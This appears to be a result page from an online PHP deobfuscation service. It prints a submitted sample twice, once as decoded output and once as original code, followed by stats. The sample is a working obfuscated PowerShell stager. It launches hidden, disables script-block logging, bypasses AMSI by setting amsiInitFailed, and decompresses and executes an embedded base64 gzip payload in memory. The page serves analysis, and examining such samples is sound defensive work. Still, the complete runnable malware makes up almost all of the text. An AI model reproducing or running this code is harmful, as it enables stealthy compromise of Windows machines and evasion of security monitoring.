Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else..
Decoded Output download
<? powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c $i1qTe=((''{3}na''+''{0}l''+''e{2}c''+''riptBlo''+''c{1}Log''+''ging'')-f''b'',''k'',''S'',''E''); $fEc=((''Sc{2}''+''ip''+''t{0}''+''loc''+''k{1}ogging'')-f''B'',''L'',''r'');If($PSVersionTable.PSVersion.Major -ge 3){ $xEAk0=[Collections.Generic.Dictionary[string,System.Object]]::new(); $d8cp2=[Ref].Assembly.GetType(((''S{5}stem.{0}''+''ana{1}emen''+''t.''+''{''+''3}{''+''2}tom''+''a''+''tion.{4}tils'')-f''M'',''g'',''u'',''A'',''U'',''y'')); $foB=((''{''+''2}''+''na{''+''4''+''}leScr''+''i{1}tB''+''l''+''oc{0}In{3}ocation{5}ogging'')-f''k'',''p'',''E'',''v'',''b'',''L''); $ah=$d8cp2.GetField(''cachedGroupPolicySettings'',''NonPublic,Static''); $kFOx=[Ref].Assembly.GetType(((''{3''+''}{1}{9''+''}t''+''em.{''+''5}ana''+''{''+''4}''+''ement.{7''+''}{6}t{8}ma''+''t''+''i''+''{8}n.{7''+''}''+''m{9''+''}i''+''{''+''0''+''}ti{''+''2}''+''{''+''9}'')-f''U'',''y'',''l'',''S'',''g'',''M'',''u'',''A'',''o'',''s'')); if ($kFOx) { $kFOx.GetField(((''a{4}si{0''+''}{3''+''}''+''i''+''{2}''+''F''+''ai{1''+''}e''+''d'')-f''I'',''l'',''t'',''n'',''m''),''NonPublic,Static'').SetValue($null,$true); }; If ($ah) { $p64=$ah.GetValue($null); If($p64[$fEc]){ $p64[$fEc][$i1qTe]=0; $p64[$fEc][$foB]=0; } $xEAk0.Add($i1qTe,0); $xEAk0.Add($foB,0); $p64[''HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\''+$fEc]=$xEAk0; } Else { [Ref].Assembly.GetType(((''''+''S{3''+''}st''+''em.{2}an''+''a''+''gem''+''ent.A{5''+''}tomation.Script{1}{4}oc''+''{0}'')-f''k'',''B'',''M'',''y'',''l'',''u'')).GetField(''signatures'',''NonPublic,Static'').SetValue($null,(New-Object Collections.Generic.HashSet[string])); }};&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(((''H4sIAJmVHWQCA7VW+2/aSBD+vVL/B6tCwqgEm0fzkird2oRHEoiBAAGKqsVe2{1}vWXmIvIaTX//1msR0SNenlTqolkn3Mz''+''M5+883MuuvQFpSHCiXKj48flPSzcIQDRc09jKe9opK7740K+83c7aH/XfmqqDO0''+''WtV5gGk4Pz0111FEQpHMS00iUByTYMEoidWC8rcy9klEDq4Wt8QWyg8l973UZHyBW''+''Sq2NbHtE+UAhY7cu+Q2ln6VBitGhZr/9i1fmB2U56WzuzVmsZofbGNBgpLDWL6g/CzIA6+3K6LmO9SOeM{1}dUR''+''rTsFopDcMYu6QL1u5JhwifO3EeLrO/TkTEOgqTW0kziZCah6EVcRs5TkTiOF9UZvKA2Xz+lzpLT++vQ0EDUmqHgkR8NSDRPbVJXGrh0GGkT9w5aA1ERENvX''+''iiA2D1fEjUXrhkrKv/FjNolmwy79yqpz5VAyhJRoQg{1}feWeHe6sGUk08684uuNBAb6UC4DfTwmhm7FnRTvm1SsE2i9k32y3Q8Bn1eI{1}3Wl/VfSi0oHTseDRFqa562hNCvMn{1}JWce3l5rBffa66c6YLmLYWF2YhTZ75Xf0GAnL8RUuZtNteJS0NS34''+''Y4oHZGWPW1oBCXkR0kpUysC+6p+XSDOHXCiIeFhFly4{1}e1s4CKJ11jTZlDImRDYGPwCmJeeOl''+''MEjk13w47JADwkjmQNedCmpBMOk2NbXa6nINQ3mQ4jouKtYY8tYvKgGBGnKKCwpimW2gt+G6Y37vbWTNBbRyLzNy88BLN9FSTh7GI1jZE''+''FRC4H''+''qyITTGTgBSVFnWIsR1QLzs9/yocJmYMsgcs3UM4YEXCMBCSK5FTTHlRKA2IaAcrRgIQ2tWNBsMeVIk0SXbswh5{1}8q87mqVCwnsJTIbIMzch2gPGRVEZ0UhAEZIg39L/58Ov1Uc6Y0YkjY2aZdjM2AqZAbnoUFI0BWgHRyQAikbEAwPH5LCWlBn1k3ZFLQTfpB2yjnO+pOX2Bn4d+A077rEldB''+''7Qapt3bDO2mo1jRDfe{1}j7uIts5d8jJYFQTg7O2MC3U6lHdqPm2oV/DeNgW7WZbTNqode3bTLfOlg9aLdbppjWWthIbdq3W''+''utFRtVq7qupLwG5Cy94SOd2Abh4uYQz19OrSaMeG3mZn52Z/Ma40pmPW0moN3{1}3zeHA4qWuaduLgemeLkMGdamd7U+7z65YdGLWQaydmbYnOEDLDs1H''+''D4BcTI0KW''+''NsLeipte59ENPBMZDZuSaW/YMHq9hoGGzdu7+onmaSfjG+wb41GFTlc3fR/mjU2rd6HptbZDHvl0A8A1OcJeH2Q8s2L7LsjUPyPjc5fHFbw0ODJApjG''+''9Q01/smpYDPavh{1}WORq{1}7g9''+''HldNvQtPLEqqGWzsdND/VAHHtGD6P4vv5Y18ojhzvjL''+''92Jq41u2JFWN3uWfyPvrK0C+XfTql/Y0/LGvjqqGfqdGdCALSqOdjI8NsLNhWfde05vfNR/6G4XcO5Q00afgC6zIQ1FtTLPeYvVoi9r6scPObt59Iw2b7WMDo5iHzOgE/SCLKcbPGqk5d3iVGqoKjwSli''+''QKCYO+Cp03ywTEGLdlb0naADS2pN3I7jds77{1}6bVRQngQL+6aTLZ2eTsFJSK/osHRJQk/4Rf2hquvQKvQHvbZLovdfzOSrrQqmirLVSFgSw2{1}n''+''GG{1}RV1HVP40TPCcE1LXfIPUWaHD0EuoQFMakOkjoDM7Zc+CSWz3RYA8b4FWGW8/kQyJhB+gfkDslJ2Sbfd62c/{1}LdP4nGZOWOB/+Of/KmP3ab3bf{1}S''+''K9uEPnl9WXC8+aw{1}8DYIypALkB1GpGksfDG''+''zikSfIswDI4kARu+slX9dVaHHThlbZrF/8A{1}/GzY80LAAA{0}'')-f''='',''x'')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" ?>
Did this file decode correctly?
Original Code
powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c $i1qTe=((''{3}na''+''{0}l''+''e{2}c''+''riptBlo''+''c{1}Log''+''ging'')-f''b'',''k'',''S'',''E''); $fEc=((''Sc{2}''+''ip''+''t{0}''+''loc''+''k{1}ogging'')-f''B'',''L'',''r'');If($PSVersionTable.PSVersion.Major -ge 3){ $xEAk0=[Collections.Generic.Dictionary[string,System.Object]]::new(); $d8cp2=[Ref].Assembly.GetType(((''S{5}stem.{0}''+''ana{1}emen''+''t.''+''{''+''3}{''+''2}tom''+''a''+''tion.{4}tils'')-f''M'',''g'',''u'',''A'',''U'',''y'')); $foB=((''{''+''2}''+''na{''+''4''+''}leScr''+''i{1}tB''+''l''+''oc{0}In{3}ocation{5}ogging'')-f''k'',''p'',''E'',''v'',''b'',''L''); $ah=$d8cp2.GetField(''cachedGroupPolicySettings'',''NonPublic,Static''); $kFOx=[Ref].Assembly.GetType(((''{3''+''}{1}{9''+''}t''+''em.{''+''5}ana''+''{''+''4}''+''ement.{7''+''}{6}t{8}ma''+''t''+''i''+''{8}n.{7''+''}''+''m{9''+''}i''+''{''+''0''+''}ti{''+''2}''+''{''+''9}'')-f''U'',''y'',''l'',''S'',''g'',''M'',''u'',''A'',''o'',''s'')); if ($kFOx) { $kFOx.GetField(((''a{4}si{0''+''}{3''+''}''+''i''+''{2}''+''F''+''ai{1''+''}e''+''d'')-f''I'',''l'',''t'',''n'',''m''),''NonPublic,Static'').SetValue($null,$true); }; If ($ah) { $p64=$ah.GetValue($null); If($p64[$fEc]){ $p64[$fEc][$i1qTe]=0; $p64[$fEc][$foB]=0; } $xEAk0.Add($i1qTe,0); $xEAk0.Add($foB,0); $p64[''HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\''+$fEc]=$xEAk0; } Else { [Ref].Assembly.GetType(((''''+''S{3''+''}st''+''em.{2}an''+''a''+''gem''+''ent.A{5''+''}tomation.Script{1}{4}oc''+''{0}'')-f''k'',''B'',''M'',''y'',''l'',''u'')).GetField(''signatures'',''NonPublic,Static'').SetValue($null,(New-Object Collections.Generic.HashSet[string])); }};&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(((''H4sIAJmVHWQCA7VW+2/aSBD+vVL/B6tCwqgEm0fzkird2oRHEoiBAAGKqsVe2{1}vWXmIvIaTX//1msR0SNenlTqolkn3Mz''+''M5+883MuuvQFpSHCiXKj48flPSzcIQDRc09jKe9opK7740K+83c7aH/XfmqqDO0''+''WtV5gGk4Pz0111FEQpHMS00iUByTYMEoidWC8rcy9klEDq4Wt8QWyg8l973UZHyBW''+''Sq2NbHtE+UAhY7cu+Q2ln6VBitGhZr/9i1fmB2U56WzuzVmsZofbGNBgpLDWL6g/CzIA6+3K6LmO9SOeM{1}dUR''+''rTsFopDcMYu6QL1u5JhwifO3EeLrO/TkTEOgqTW0kziZCah6EVcRs5TkTiOF9UZvKA2Xz+lzpLT++vQ0EDUmqHgkR8NSDRPbVJXGrh0GGkT9w5aA1ERENvX''+''iiA2D1fEjUXrhkrKv/FjNolmwy79yqpz5VAyhJRoQg{1}feWeHe6sGUk08684uuNBAb6UC4DfTwmhm7FnRTvm1SsE2i9k32y3Q8Bn1eI{1}3Wl/VfSi0oHTseDRFqa562hNCvMn{1}JWce3l5rBffa66c6YLmLYWF2YhTZ75Xf0GAnL8RUuZtNteJS0NS34''+''Y4oHZGWPW1oBCXkR0kpUysC+6p+XSDOHXCiIeFhFly4{1}e1s4CKJ11jTZlDImRDYGPwCmJeeOl''+''MEjk13w47JADwkjmQNedCmpBMOk2NbXa6nINQ3mQ4jouKtYY8tYvKgGBGnKKCwpimW2gt+G6Y37vbWTNBbRyLzNy88BLN9FSTh7GI1jZE''+''FRC4H''+''qyITTGTgBSVFnWIsR1QLzs9/yocJmYMsgcs3UM4YEXCMBCSK5FTTHlRKA2IaAcrRgIQ2tWNBsMeVIk0SXbswh5{1}8q87mqVCwnsJTIbIMzch2gPGRVEZ0UhAEZIg39L/58Ov1Uc6Y0YkjY2aZdjM2AqZAbnoUFI0BWgHRyQAikbEAwPH5LCWlBn1k3ZFLQTfpB2yjnO+pOX2Bn4d+A077rEldB''+''7Qapt3bDO2mo1jRDfe{1}j7uIts5d8jJYFQTg7O2MC3U6lHdqPm2oV/DeNgW7WZbTNqode3bTLfOlg9aLdbppjWWthIbdq3W''+''utFRtVq7qupLwG5Cy94SOd2Abh4uYQz19OrSaMeG3mZn52Z/Ma40pmPW0moN3{1}3zeHA4qWuaduLgemeLkMGdamd7U+7z65YdGLWQaydmbYnOEDLDs1H''+''D4BcTI0KW''+''NsLeipte59ENPBMZDZuSaW/YMHq9hoGGzdu7+onmaSfjG+wb41GFTlc3fR/mjU2rd6HptbZDHvl0A8A1OcJeH2Q8s2L7LsjUPyPjc5fHFbw0ODJApjG''+''9Q01/smpYDPavh{1}WORq{1}7g9''+''HldNvQtPLEqqGWzsdND/VAHHtGD6P4vv5Y18ojhzvjL''+''92Jq41u2JFWN3uWfyPvrK0C+XfTql/Y0/LGvjqqGfqdGdCALSqOdjI8NsLNhWfde05vfNR/6G4XcO5Q00afgC6zIQ1FtTLPeYvVoi9r6scPObt59Iw2b7WMDo5iHzOgE/SCLKcbPGqk5d3iVGqoKjwSli''+''QKCYO+Cp03ywTEGLdlb0naADS2pN3I7jds77{1}6bVRQngQL+6aTLZ2eTsFJSK/osHRJQk/4Rf2hquvQKvQHvbZLovdfzOSrrQqmirLVSFgSw2{1}n''+''GG{1}RV1HVP40TPCcE1LXfIPUWaHD0EuoQFMakOkjoDM7Zc+CSWz3RYA8b4FWGW8/kQyJhB+gfkDslJ2Sbfd62c/{1}LdP4nGZOWOB/+Of/KmP3ab3bf{1}S''+''K9uEPnl9WXC8+aw{1}8DYIypALkB1GpGksfDG''+''zikSfIswDI4kARu+slX9dVaHHThlbZrF/8A{1}/GzY80LAAA{0}'')-f''='',''x'')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
Function Calls
None |
Stats
MD5 | cba9648a76ce244d482edccdbc6b2b2d |
Eval Count | 0 |
Decode Time | 32 ms |